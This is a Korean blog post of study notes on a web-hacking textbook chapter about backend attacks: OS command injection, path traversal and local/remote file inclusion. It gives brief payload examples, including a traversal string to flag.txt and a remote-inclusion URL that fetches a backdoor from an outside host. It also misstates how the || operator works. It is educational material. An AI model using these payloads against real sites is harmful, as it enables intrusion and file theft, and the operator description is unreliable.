웹 해킹 & 보안 완벽 가이드 10장 정리

2024. 1. 15. 21:18ㆍ웹 해킹 & 보안 완벽 가이드 정리

10 백엔드 컴포넌트 공격

컴포넌트란?

재사용이 가능한 각각의 독립적으로 생성된 모듈

OS Command Injection

사용자의 입력값에 의해 시스템 명령어가 실행되는 취약점

PHP exec함수 eval함수

&& 첫 번쨰 명령이 성공했을 경우메나 두 번쨰 명령을 실행

|| 첫 번쨰 명령 성공 여부 상관없이 두 번쨰 명령 실행

Path Traversal 취약점

../ 상위 디렉토리

ex) ../../flag.txt

절대경로: / -> 최상위 디렉터리를 기준으로 찾음

상대경로:./ -> 현재 디렉터리를 기준으로 찾음

File Inclustion 취약점

RFI(Remote File Inclusion) 외부의 서버로부터 웹쉘을 가져옴

EX) index.php?color=http://123.123/backdoor

LFI(Local File Inclusion) 로컬에 있는 파일을 읽는 취약점

EX) index.php?color=../../flag.txt

'웹 해킹 & 보안 완벽 가이드 정리' 카테고리의 다른 글

웹 해킹 & 보안 완벽 가이드 12장 정리 (0)	2024.01.31
웹 해킹 & 보안 완벽 가이드 09장 정리 (0)	2023.11.18
웹 해킹 & 보안 완벽 가이드 06장 정리 (0)	2023.10.16
웹 해킹 & 보안 완벽 가이드 05장 정리 (1)	2023.10.16
웹 해킹 & 보안 완벽 가이드 03장 정리 (0)	2023.10.08

내 블로그 - 관리자 홈 전환	`Q` `Q`
새 글 쓰기	`W` `W`

글 수정 (권한 있는 경우)	`E` `E`
댓글 영역으로 이동	`C` `C`

이 페이지의 URL 복사	`S` `S`
맨 위로 이동	`T` `T`
티스토리 홈 이동	`H` `H`
단축키 안내	`Shift` + `/` `⇧` + `/`

태그

최근글

댓글

공지사항

아카이브

10 백엔드 컴포넌트 공격

컴포넌트란?

OS Command Injection

Path Traversal 취약점

File Inclustion 취약점

RFI(Remote File Inclusion) 외부의 서버로부터 웹쉘을 가져옴

LFI(Local File Inclusion) 로컬에 있는 파일을 읽는 취약점

'웹 해킹 & 보안 완벽 가이드 정리' 카테고리의 다른 글

관련글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

태그

최근글

댓글

공지사항

아카이브

10 백엔드 컴포넌트 공격

컴포넌트란?

OS Command Injection

Path Traversal 취약점

File Inclustion 취약점

RFI(Remote File Inclusion) 외부의 서버로부터 웹쉘을 가져옴

LFI(Local ****File Inclusion) 로컬에 있는 파일을 읽는 취약점

'웹 해킹 & 보안 완벽 가이드 정리' 카테고리의 다른 글

관련글

티스토리툴바

단축키

내 블로그

블로그 게시글

모든 영역

LFI(Local File Inclusion) 로컬에 있는 파일을 읽는 취약점